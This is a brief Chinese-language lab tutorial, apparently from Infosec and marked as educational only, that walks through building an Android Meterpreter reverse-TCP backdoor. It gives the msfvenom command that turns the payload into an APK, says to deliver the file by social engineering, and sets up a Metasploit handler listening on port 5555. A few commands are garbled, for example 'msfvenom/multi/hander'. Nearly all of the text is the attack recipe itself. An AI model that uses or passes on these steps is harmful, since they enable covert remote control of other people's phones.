介绍
我们将使用以下工具对此进行演示
- 厉害的Linux
- Android设备
- VMware或VirtualBox(虚拟环境)
注意:此实验室仅用于教育目的。作者和/或Infosec对用户执行的任何非法活动概不负责。
步骤一:启动厉害的Linux,
模块模糊搜索:search android/me
这里我们选择android/meterpreter/reverse_tcp
步骤二:创建apk安装包
msfvenom -p android/meterpreter/reverse_tcp lhost=localhost ip lport=local port r>filename.apk
步骤三:将文件通过不通渠道导入android设备(社会工程学)
步骤四:使用脚本程序
use msfvenom/multi/hander
步骤五:
接下来,设置有效负载,侦听器IP(LHOST)和侦听器PORT(LPORT)的选项。在使用MSFvenom创建.apk文件时,我们使用了本地主机IP,端口号5555和有效负载android / meterpreter / reverse_tcp